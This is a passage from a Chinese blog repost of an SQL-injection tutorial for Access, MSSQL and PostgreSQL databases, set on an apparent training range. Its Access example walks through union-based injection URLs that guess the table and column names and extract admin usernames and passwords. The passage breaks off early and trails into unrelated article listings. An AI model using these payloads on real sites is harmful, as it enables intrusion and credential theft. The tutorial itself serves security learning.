Web漏洞-access注入、Sql Sever（Mssql）注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例_your sqlmap version is outdated

一、导图

二、各种数据库的注入特点

1.access注入

access数据库：
access
    表名
        列名
            数据
 
mysql、mssql等数据库：
    数据库名
        表名
            列名
                数据
 
--->比正常其它数据库少一级，其数据库保存在网站原码下面。
 
--->后缀格式为mdb、asp、asa，可以通过一些暴库手段、目录猜解等直接下载数据库。
 
--->另一个网站的数据库假如也是access，则其数据库也保存在它自己网站原码的目录下，
    和上一个网站没有任何关系，将不存在跨库注入。
 
--->access没有文件读写。
 
--->access三大攻击手法
1.access注入攻击片段-联合查询法
2.access注入攻击片段-逐字猜解法
3.工具类的使用注入（推荐）
 
--->access注入攻击方式
主要有：union注入、http header注入、偏移注入等

实例

本实例来自墨者学院

第一步：判断字段数

219.153.49.228:49079/new_list.asp?id=1%20order%20by%204
返回页面正常
219.153.49.228:49079/new_list.asp?id=1%20order%20by%205
返回页面不正常
 
------>列数（字段数）为：4

第二步：猜解表名

因为access数据库不包含数据库名，所以直接从表名开始查询。

因为access数据我库不像Mysql数据库中存在系统数据库“information_schema”，所以在注入过程中需要我们进行暴力猜解。

向网站末尾添加猜测的表名
如果数据库中存在此表，网页就会返回数字
如果数据库中不存在此表，网页就会返回错误

219.153.49.228:49079/new_listasp?id=1%20union%20select%201,2,3,4%20from%20admin
页面返回数字，存在表名admin
219.153.49.228:49079/new_listasp?id=1%20union%20select%201,2,3,4%20from%20dsadasdasd
页面返回错误，不存在表名dsadasdasd

第三步：猜解列名

猜解完表明后用同样的方法猜解列名

向网站内添加猜测的列名
如果数据库中存在此列，网页就会返回相应数据
如果数据库中不存在此列，网页就会返回错误

219.153.49.228:49079/new_list.asp?id=1%20union%20select%201,username,passwd,4%20from%20admin
 
经过不断猜解，最终正确列名为username和passwd，成功查询出了数据。

第四步：密码解密

第五步：登录后台获取KEY

第六步：提交KEY

2.Sql Sever（Mssql）注入

详细内容可参考“MSSQL注入”

Sql Sever注入

实例

本实例来自墨者学院

判断数据库类型

判断数据库版本

使用工具

Mysql注入

------>注意与Mysql进行对比。

判断数据库版本

3.PostgreSql注入

实例

本实例来自墨者学院

数据库识别

┌──(root
声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/知新_RL/article/detail/370747
推荐阅读
article使用Eclipse集成SDK时C++遇到的问题及解决_error while launching c...
1，项目编译啥的都没问题，启动项目也没问题。就是build完以后，只能run, 不能debug。出了很多错，以下一一列出...
                
                    赞
踩
article访问控制模型（DAC,MAC,RBAC,ABAC）_主访问控制模型(discretionary ac...
访问控制模型项目中需要加入访问控制，对访问控制模型做了一些调研, 本文主要是介绍一些常用的访问控制模型。基本要素访问控制...
                
                    赞
踩
articleRBAC（Role-Based Access Control：基于角色的访问控制）_role bas...
RBAC（Role-Based Access Control：基于角色的访问控制）_role based access ...
                
                    赞
踩
article基于角色访问控制-RBAC（Role-Based Access Control）_rbac 需求分析...
RBAC（Role-Based Access Control）是一种基于角色的访问控制模型，它是一种安全策略，用于限制系...
                
                    赞
踩
articleRBAC（Role-Based Access Control，基于角色的访问控制）_typeorm ...
通过角色的使用，可以轻松地管理和调整用户的权限，而无需单独修改每个用户的权限设置。此外，RBAC还有助于实施最小权限原则...
                
                    赞
踩
articleRBAC（基于角色的访问控制权限的基本模型）_rbac(role based access cont...
（一）基本概念 1.定义 RBAC（Role-Based Access Control），也就是所谓的**“基于角色的访...
                
                    赞
踩
articleMS Access 教程之如何将 MDB 文件转换为 SQLite 数据库_mdb转sqlite...
出于这个原因，我创建了一个解决方案，允许我将 MS Access 数据库导出到 SQLite 数据库。我将代码上传到el...
                
                    赞
踩
articleLLMs：《BLOOM: A 176B-Parameter Open-Access Multilin...
​LLMs：《BLOOM: A 176B-Parameter Open-Access Multilingual Lang...
                
                    赞
踩
articleMSSQL-基础实用语句集_sql check(savingtype='活期' or savingt...
sql分享 --创建文件夹exec xp_cmdshell 'mkdir F:\Student','no_output'...
                
                    赞
踩
articlecannot access com.baomidou.mybatisplus.extension.a...
cannot access com.baomidou.mybatisplus.extension.activerecor...
                
                    赞
踩
articlevscode更新至1.86版本后，ssh远程连接服务器出现异常_you are about to c...
you are connected to an OS version that is unsupported by Vi...
                
                    赞
踩
articleUnrecognized Hadoop major version number: 3.0.0 版本...
hive与hadoop的兼容性问题1. 问题出现工作需要，在本地安装hive进行相关测试工作，版本选的是hadoop-3...
                
                    赞
踩
articleUnrecognized Hadoop major version number: 3.0.0-cd...
spark提交job到yarn报错，业务代码比较简单，通过接口调用获取数据，将数据通过sparksql将数据写入hive...
                
                    赞
踩
articlespark 集群启动出现 Unrecognized Hadoop major version num...
spark使用hive中有比较多的坑，尤其是版本问题引起的jar包冲突，比较好的方式是使用与CDH匹配的hive和had...
                
                    赞
踩
articleCaused by: java.lang.IllegalArgumentException: Unr...
Spark本地使用IntelliJ IDEA连接Hive关于“Caused by: java.lang.IllegalA...
                
                    赞
踩
articleUnrecognized Hadoop major version number:3.0.0报错解决...
如文字标题，这个问题困扰了我三天，最终还是排查解决了。这个是运用spark.env.sh里面的hadoop_home_d...
                
                    赞
踩
article初始化：Caused by: java.lang.IllegalArgumentException:...
mysql整合hive，初始化（bin/schematool -initSchema -dbType mysql -ve...
                
                    赞
踩
articlespark写hive报错 （Unrecognized Hadoop major version nu...
Caused by: java.lang.IllegalArgumentException: Unrecognized ...
                
                    赞
踩
articleMapReduce任务报错：Unrecognized Hadoop major version nu...
问题描述： 之前写了一个读取RCFile的MapReduce任务，现在放到测试集群上报错了错误信息：Error: jav...
                
                    赞
踩
articlejava.lang.IllegalArgumentException: Unrecognized H...
注意点在Caused by: java.lang.IllegalArgumentException: Unrecogni...
                
                    赞
踩
相关标签
ABAC
RBAC
访问控制
安全
运维
权限控制
角色管理
数据库
sqlite
microsoft
BLOOM
基础大模型
自然语言处理
css
vscode
ssh
服务器
vscode1.86
1.86版本
ssh远程连接
hive
hadoop
spark
大数据